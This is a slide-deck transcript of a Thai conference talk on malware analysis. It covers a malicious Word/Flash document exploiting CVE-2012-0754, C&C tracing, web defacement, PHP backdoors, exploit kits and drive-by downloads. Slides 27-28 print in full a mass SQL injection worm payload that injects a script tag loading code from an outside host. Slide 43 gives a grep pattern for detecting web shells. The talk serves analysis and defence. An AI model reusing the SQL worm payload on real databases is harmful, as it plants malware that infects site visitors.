Advanced Malware Analysis

1,713 views
1,445 views

Published on

Published in: Technology
0 Comments
0 Likes
Statistics
Notes
  • Be the first to comment

  • Be the first to like this

No Downloads
Views
Total views
1,713
On SlideShare
0
From Embeds
0
Number of Embeds
10
Actions
Shares
0
Downloads
62
Comments
0
Likes
0
Embeds 0
No embeds

No notes for slide

Advanced Malware Analysis

  1. 1. www.cdicconference.com “Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” ชำแหละโปรแกรมไม่พงประสงค์ ด้วยเทคนิคเหนือเมฆ ึ อ. ประธาน พงศ์ทิพย์ฤกษ์SANS GIAC GPEN, eCPPT, ECSA, CEH, CPTS, CIW Security Analyst, CWNA, CWSP, Security+, ITIL-F Section Manager, Senior Information Security Consultant ACIS Professional Center 1
  2. 2. Let’s Party Rock Next Generation for Malware  Malware Analysis Web Based Malware  Back to the Past  Back to the Future Lab Challenge 2 2
  3. 3. www.cdicconference.com“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity”Next Generation of Malware 3
  4. 4. Old Malware fashion Executable file  Packer, Crypter => FUD just 1 Week !! Spyware / Adware Rogue Security Software Virus / Worm USB Autorun 4 4
  5. 5. Antivirus Detected Gotcha !! 5 5
  6. 6. Virustotal 6 6
  7. 7. Virustotal – One Week later 7 7
  8. 8. Anubis: Analyzing Binary File 8 8
  9. 9. Latest Malware fashion MS Office+Flash Player PDF Reader Mobile Application Social Network Application Web Browser Toolbar Web based Malware 9 9
  10. 10. Bypassing Antivirus Ninja Techniques 10 10
  11. 11. Malware Analysis 11 11
  12. 12. CVE-2012-0754: SWF in DOC “Iran’s Oil and Nuclear Situation.doc”  Contains flash instructing it to download and Parse a malformed MP4. OS Affect  Adobe Flash Player before 10.3.183.15 and 11.x Before 11.1.102.62 on Windows, Mac OS X, Linux And Solaris Mobile Affect  Adobe Flash Player before 11.1.111.6 on Android 2.x and 3.x and before 11.1.115.6 on Android 4.x 12 12
  13. 13. Document Analysis Decompiled Flash from file  This.MyNS.play(“http://208.115.230.76/test.mp4”); Whois – 208.115.230.76  208.115.230.76 76-230-115-208.static.reverse.lstn.net Host reachable, 77 ms. average, 2 of 4 pings lost 208.115.192.0 - 208.115.255.255 Limestone Networks, Inc. 400 S. Akard Street Suite 200 Dallas TX 75202 United States 13 13
  14. 14. Process Monitor network log 14 14
  15. 15. Process Monitor network log 15 15
  16. 16. Traffic and C&C (us.exe) 16 16
  17. 17. Virus Analysis – us.exe 17 17
  18. 18. Target Analysis Whois – 199.192.156.134  199.192.156.134 Host reachable, 89 ms. average 199.192.152.0 - 199.192.159.255 VPS21 LTD 38958 S FREMONT BLVD FREMONT CA 94536 United States zou, jinhe +1-408-205-7550 18 18
  19. 19. www.cdicconference.com“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” Web Based Malware 19
  20. 20. Back to the Past 20 20
  21. 21. Web Defacement 21 21
  22. 22. Zone-H 22 22
  23. 23. Ddos Tool 23 23
  24. 24. Hack 4 Fun and Profit 24 24
  25. 25. Back to the Future 25 25
  26. 26. About My Memory 2008  Oishi website was hacked without defacement  Kaspersky AV alert for “A little javascript file” 2009  SQL injection worms on MSSQL  Affect many Bank on Thailand 2010  Google and Firefox alert for malware website  Obfuscation JS to bypass AV 2011  Many website was blocked by Google Malware 26 26
  27. 27. SQL Injection Worms;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(0x4400450043004C0041005200450020004000540020007600610072006300680061007200280032003500350029002C0040004300200076006100720063006800610072002800320035003500290020004400450043004C0041005200450020005400610062006C0065005F0043007500720073006F007200200043005500520053004F005200200046004F0052002000730065006C00650063007400200061002E006E0061006D0065002C0062002E006E0061006D0065002000660072006F006D0020007300790073006F0062006A006500630074007300200061002C0073007900730063006F006C0075006D006E00730020006200200077006800650072006500200061002E00690064003D0062002E0069006400200061006E006400200061002E00780074007900700065003D00270075002700200061006E0064002000280062002E00780074007900700065003D003900390020006F007200200062002E00780074007900700065003D003300350020006F007200200062002E00780074007900700065003D0032003300310020006F007200200062002E00780074007900700065003D003100AS%20NVARCHAR(4000));EXEC(@S);-- 27 27
  28. 28. SQL Injection Worms;DECLARE%20@S%20NVARCHAR(4000);SET%20@S=CAST(D E C L A R E@T varchar(255),@C varchar(255) DECLARE Table_Cursor CURSOR FOR select a.name,b.name from sysobjects a,syscolumns b where a.id=b.id and a.xtype=u and (b.xtype=99 or b.xtype=35 or b.xtype=231 or b.xtype=167) OPEN Table_Cursor FETCH NEXT FROM Table_Cursor INTO @T,@C WHILE(@@FETCH_STATUS=0)BEGIN exec(update [+@T+] set [+@C+]=rtrim(convert(varchar,[+@C+]))+<script src=http://www.fengnima.cn/k.js></script>)FETCH NEXT FROM Table_Cursor INTO @T,@CEND CLOSE Table_Cursor DEALLOCATE Table_Cu r s o r undefined AS%20NVARCHAR(4000));EXEC(@S);-- 28 28
  29. 29. Web Application Backdoor 29 29
  30. 30. Web Application Backdoor - FUD 30 30
  31. 31. Redbull.php (PHP Backdoor) 31 31
  32. 32. Insert Malicious JS into config.inc.php 32 32
  33. 33. Crimepack Exploit Kit 33 33
  34. 34. Crimeware Exploit Kit 34 34
  35. 35. Drive-By Download Visit Malicious Website Malicious JS execute Web Server Redirect to Malware Server Exploit Browser / Flash PlayerReverse Shell to Attacker Malware Server 35 34
  36. 36. Google Malware Alert 36 35
  37. 37. Google Diagnostic 37 36
  38. 38. http://www.stopbadware.org/hom e/reviewinfo 38 37
  39. 39. http://sitecheck.sucuri.net/scanner 39 38
  40. 40. http://sucuri.net/malware/malwar e-entry-mwhta7 40 39
  41. 41. http://sucuri.net/malware/malwar e-entry-mwhta7 41 40
  42. 42. http://www.urlvoid.com 42 41
  43. 43. Detect Webserver Backdoor Manual Source review NeoPI – Neohapsis PHP Shell Scanner http://25yearsofprogramming.com/php/findmaliciouscode.htm grep -RPl --include=*.{php,txt,asp} "(passthru|shell_exec|system|phpinfo|base64_decode|chmod|mkdi r|fopen|fclose|readfile) *(” /var/www/ 43 42
  44. 44. PHP Shell Scanner 44 43
  45. 45. Undetectable #1 45 44
  46. 46. Undetectable #2 46 45
  47. 47. JS De-Obfuscate Tool Google Chrome Developer Tools Firebug (Firefox’s plugin) JSDebug (Firefox’s plugin) Javascript Deobfuscator (Firefox’s plugin) Malzilla Rhino SpiderMonkey 47 46
  48. 48. Simple JS Obfuscate 48 47
  49. 49. Simple JS Obfuscate 49 48
  50. 50. www.cdicconference.com“Is Your Privacy at Risk? Security and Privacy Challenges in the Digital Modernity” Lab Challenge 50
  51. 51. Be Safewww.cdicconference.com 51 50

×